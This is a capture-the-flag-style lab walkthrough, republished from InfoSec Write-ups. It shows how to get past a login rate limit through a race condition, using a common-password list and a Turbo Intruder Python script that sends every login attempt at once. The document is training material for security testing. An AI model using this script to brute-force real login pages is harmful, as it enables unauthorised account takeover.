9.2 Lab: Bypassing rate limits via race conditions | 2024
2024-2-28 03:46:11 Author: infosecwriteups.com(查看原文) 阅读量:6 收藏

This lab’s login mechanism uses rate limiting to defend against brute-force attacks. However, this can be bypassed due to a race condition. To solve the lab, bypass the rate limit. Successfully brute-force the password for the user carlos. Log in and access the admin panel and delete the user carlos | Karthikeyan Nagaraj

Karthikeyan Nagaraj

InfoSec Write-ups

This lab’s login mechanism uses rate limiting to defend against brute-force attacks. However, this can be bypassed due to a race condition.

To solve the lab:

  1. Work out how to exploit the race condition to bypass the rate limit.
  2. Successfully brute-force the password for the user carlos.
  3. Log in and access the admin panel.
  4. Delete the user carlos.

You can log in to your account with the following credentials: wiener:peter.

You should use the following list of potential passwords:

123123
abc123
football
monkey
letmein
shadow
master
666666
qwertyuiop
123321
mustang
123456
password
12345678
qwerty
123456789
12345
1234
111111
1234567
dragon
1234567890
michael
x654321
superman
1qaz2wsx
baseball
7777777
121212
000000
  1. Try to log in with the username Carlos with a wrong password and Capture the request.
  2. Send it to Repeater for Testing.
  3. Install Turbo Intruder in Extensions → BAPP Store.
  4. In Repeater, select the value of the password,
    Right click → Extensions → Turb Intruder → Send to Turbo Intruder.
  5. Paste the below python code in the script
def queueRequests(target, wordlists):

# as the target supports HTTP/2, use engine=Engine.BURP2 and concurrentConnections=1 for a single-packet attack
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=1,
engine=Engine.BURP2
)

# assign the list of candidate passwords from your clipboard
passwords = wordlists.clipboard

# queue a login request using each password from the wordlist
# the 'gate' argument withholds the final part of each request until engine.openGate() is invoked
for password in passwords:
engine.queue(target.req, password, gate='1')

# once every request has been queued
# invoke engine.openGate() to send all requests in the given gate simultaneously
engine.openGate('1')

def handleResponse(req, interesting):
table.add(req)

6. Now, copy the passwords and start the Attack.

7. Check for the 302 status code, If not start the attack again or restart the lab and do the same.

8. Once you find the password, log into Carlos's Account — if it shows the timing, wait for some time, and login

9. Navigate to Admin Panel and delete the User Carlos to solve the Lab


文章来源: https://infosecwriteups.com/9-2-lab-bypassing-rate-limits-via-race-conditions-2024-533185d6d94e?source=rss----7b722bfd1b8d---4
如有侵权请联系:admin#unsafe.sh